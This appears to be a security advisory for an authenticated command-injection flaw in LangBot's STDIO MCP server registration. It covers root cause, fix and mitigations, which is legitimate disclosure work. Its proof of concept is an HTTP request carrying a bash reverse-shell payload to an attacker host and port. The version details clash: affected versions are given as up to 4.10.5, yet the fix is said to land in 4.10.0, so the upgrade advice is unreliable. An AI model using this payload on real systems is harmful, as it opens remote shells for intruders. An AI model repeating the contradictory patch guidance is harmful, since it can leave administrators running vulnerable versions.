high · 8.8CVE-2026-54449Jul 15, 2026

CVE-2026-54449: LangBot Authenticated RCE via MCP STDIO Command Injection

Rohit Hatagale
AI Security Researcher, SecureLayer7

Any logged-in user of LangBot can add an STDIO-type MCP server with an arbitrary shell command, causing the server to spawn that command as a subprocess and giving the attacker full remote code execut

Packagelangbot
Ecosystempip
Affected<= 4.10.5

The problem

LangBot's Extensions panel lets authenticated users register MCP servers. For STDIO-type entries, the backend passes the user-supplied command and arguments directly to `StdioServerParameters`, which spawns a subprocess with no validation.

Because the web panel is often exposed on a public IP and registration is open, the attacker surface is wide. A stolen or self-created account is all that is needed. Exploitation gives code execution under the LangBot process identity, which typically has broad filesystem and network access.

Proof of concept

A working proof-of-concept for CVE-2026-54449 in langbot, with the exact payload below.

http
POST /api/tools/mcp HTTP/1.1
Host: langbot.target.internal:5300
Content-Type: application/json
Authorization: Bearer <valid_token>

{
  "name": "pwn",
  "type": "stdio",
  "command": "bash",
  "args": ["-c", "bash -i >& /dev/tcp/10.10.10.1/4444 0>&1"],
  "env": {}
}

The root cause is in `src/langbot/pkg/provider/tools/loaders/mcp.py`. The code imports `StdioServerParameters` from Anthropic's MCP SDK and forwards user-controlled fields straight into it, which then calls Python's `subprocess` without any allowlist, path check, or sandbox boundary.

CWE-78 applies directly: externally controlled input reaches an OS command execution sink.

The fix in v4.10.0 introduces a Box Runtime sandbox (Docker, nsjail, or E2B) that now owns all STDIO MCP subprocess launches. STDIO MCP is gated behind `box.enabled` in config. When the sandbox backend is absent or disabled, the STDIO MCP endpoint is blocked entirely rather than falling back to unsandboxed execution.

The fix

Upgrade to LangBot 4.10.0 or later. If you cannot upgrade immediately, set `box.enabled: false` in your config to disable STDIO MCP ingestion entirely (HTTP/SSE MCP connections are unaffected). Restrict the management panel to trusted networks and disable open user registration on public instances.

Reported by OX Security Research Team.

References: [1][2]

Related research